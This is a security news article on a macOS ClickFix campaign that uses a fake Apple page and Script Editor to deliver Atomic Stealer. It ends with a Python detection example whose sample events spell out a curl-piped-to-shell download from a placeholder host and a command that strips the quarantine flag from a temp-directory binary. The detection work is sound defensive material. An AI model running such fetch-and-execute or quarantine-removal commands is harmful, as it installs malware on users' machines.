macOS Malware Evolves: ClickFix Attack Chain Shifts from Terminal to Script Editor to Bypass Apple Defenses

A newly observed macOS malware campaign is signaling a tactical shift in how attackers deliver infostealers, quietly abandoning the Terminal in favor of a less scrutinized native tool. Researchers at Jamf Threat Labs have identified a variant of the widely used ClickFix social engineering technique that leverages Script Editor, opening a new path to execute malicious code while sidestepping recent Apple protections.


A Familiar Trick, Rewired for macOS


ClickFix campaigns have historically relied on a simple but effective tactic: trick users into copying and pasting commands into the Terminal under the guise of fixing system issues. Apple’s recent updates, including enhanced scanning of pasted Terminal commands, were designed to disrupt exactly this behavior.


This latest campaign adapts quickly. Instead of guiding users into Terminal, attackers now redirect execution into Script Editor using a browser-triggered workflow. The shift may seem minor, but it removes a key friction point that Apple introduced and reopens a pathway for user-assisted execution.


Fake Apple Pages and a Seamless Execution Flow


The attack begins with a convincing phishing page styled to resemble official Apple guidance. Users are told they can “reclaim disk space on your Mac,” complete with step-by-step instructions that mimic legitimate system cleanup processes.


When users click an “Execute” button, the site triggers an applescript:// URL scheme. This prompts the browser to open Script Editor with a preloaded script. Instead of manually entering commands, victims are presented with a ready-to-run script that appears benign.

This design reduces user hesitation and increases the likelihood of execution. The interaction feels more like a guided system utility than a suspicious command-line operation.


Obfuscation and Fileless Execution


Once executed, the script runs a heavily obfuscated command that follows a now-familiar malware pattern:


  • A disguised string is decoded into a remote URL at runtime

  • A payload is fetched using curl, with TLS verification disabled

  • The downloaded code is piped directly into the shell for execution


This approach avoids writing the initial payload to disk, making detection more difficult for traditional security tools.


The first-stage script then unpacks a second-stage payload using encoded and compressed data. This leads to the retrieval of a Mach-O binary, which is dropped into a temporary directory, stripped of security flags, and executed.


Researchers identified the final payload as a variant of Atomic Stealer, a known infostealer targeting macOS systems.


Why Script Editor Matters


Script Editor is not a new tool in the macOS malware playbook, but its integration into a ClickFix-style campaign is notable. By shifting execution away from Terminal, attackers are effectively bypassing a control Apple specifically introduced to combat this type of social engineering.


The technique also exploits user trust. Script Editor is a native macOS application, and its interface does not immediately signal danger to most users. Combined with a polished phishing page, the attack chain becomes harder to distinguish from legitimate activity.


Apple’s Incremental Defenses, Attackers’ Rapid Iteration


Newer versions of macOS introduce additional prompts when opening and executing scripts from unknown sources. These warnings add friction, but they still rely on user judgment. As seen in this campaign, attackers continue to design workflows that minimize suspicion and streamline user interaction.


This ongoing cycle highlights a broader reality in cybersecurity. Defensive improvements often trigger rapid adaptation from threat actors, who look for alternative paths that achieve the same outcome with minimal resistance.


What This Means for macOS Security


The emergence of Script Editor-based ClickFix attacks underscores a growing trend in macOS threats:

  • Social engineering remains a primary entry point

  • Native tools are increasingly abused to evade detection

  • Fileless and staged payload delivery continues to rise

  • Security controls focused on one vector can be bypassed through adjacent system components


For enterprises and managed service providers, this reinforces the need for behavioral detection alongside traditional signature-based defenses. Monitoring unusual application launches, suspicious URL scheme usage, and script execution patterns will be critical in identifying these evolving threats.
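The execution pattern described above (Script Editor handing a shell a curl command with TLS verification disabled and piped straight into another shell, then a quarantine flag being removed from a binary in a temporary directory) can be expressed as simple process-event rules. The following is an added detection example written for this article, not code from Jamf Threat Labs or from the campaign; the process events are constructed, the URL is a placeholder, and "stripped of security flags" is assumed here to mean removing the com.apple.quarantine extended attribute.

```python
import shlex

# Constructed sample process events (not real telemetry): parent image,
# process image and full command line, as an EDR feed might report them.
SAMPLE_EVENTS = [
    {"parent": "Script Editor", "image": "sh",
     "cmdline": "sh -c 'curl -fsSLk https://EXAMPLE-PLACEHOLDER.invalid/s | sh'"},
    {"parent": "sh", "image": "xattr",
     "cmdline": "xattr -d com.apple.quarantine /private/tmp/.x/updater"},
    {"parent": "Terminal", "image": "sh",   # benign: TLS verified, output to jq
     "cmdline": "sh -c 'curl -fsSL https://formulae.brew.sh/api/formula.json | jq .'"},
    {"parent": "Finder", "image": "xattr",  # benign: only lists attributes
     "cmdline": "xattr -l /Users/alice/Downloads/report.pdf"},
]

SCRIPT_HOSTS = {"Script Editor", "osascript"}
SHELLS = {"sh", "bash", "zsh"}
TMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")

def _inner_command(cmdline):
    """Unwrap `sh -c '<pipeline>'` so the pipeline itself is inspected."""
    try:
        toks = shlex.split(cmdline)
    except ValueError:
        return cmdline
    return toks[2] if len(toks) >= 3 and toks[0] in SHELLS and toks[1] == "-c" else cmdline

def _curl_insecure(stage):
    """True if this pipeline stage is curl with -k/--insecure (also in bundled flags like -fsSLk)."""
    toks = stage.split()
    if not toks or toks[0] != "curl":
        return False
    return any(t == "--insecure" or (t.startswith("-") and not t.startswith("--") and "k" in t)
               for t in toks[1:])

def is_fetch_and_exec(cmdline):
    """curl with TLS verification off, piped directly into a shell."""
    stages = [s.strip() for s in _inner_command(cmdline).split("|")]
    last = stages[-1].split()
    return len(stages) >= 2 and _curl_insecure(stages[0]) and bool(last) and last[0] in SHELLS

def is_quarantine_strip_in_tmp(cmdline):
    """xattr removing the quarantine attribute from a file under a temp directory."""
    toks = cmdline.split()
    if not toks or toks[0] != "xattr":
        return False
    strips = ("-d" in toks and "com.apple.quarantine" in toks) or "-c" in toks
    return strips and any(t.startswith(TMP_PREFIXES) for t in toks)

def detect(events):
    """Return (event index, rule name) for every event matching a rule."""
    hits = []
    for i, ev in enumerate(events):
        if ev["parent"] in SCRIPT_HOSTS and ev["image"] in SHELLS and is_fetch_and_exec(ev["cmdline"]):
            hits.append((i, "script_editor_fetch_and_exec"))
        if is_quarantine_strip_in_tmp(ev["cmdline"]):
            hits.append((i, "quarantine_strip_in_tmpdir"))
    return hits
```

Running `detect(SAMPLE_EVENTS)` flags only the first two events; the Terminal and Finder events are ordinary administrative activity and pass.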


The Bigger Picture


This campaign is not a radical reinvention of malware delivery, but it is a precise adjustment with outsized impact. By swapping Terminal for Script Editor, attackers preserve the effectiveness of ClickFix while neutralizing recent safeguards.


It is a reminder that in modern cybersecurity, small changes in technique can significantly alter the defensive landscape. As platform vendors tighten controls, adversaries will continue probing for overlooked pathways, often hiding in plain sight within trusted system tools.


Jamf Threat Labs continues to track this activity and related infrastructure, signaling that this technique may soon become more widespread across macOS-targeted campaigns.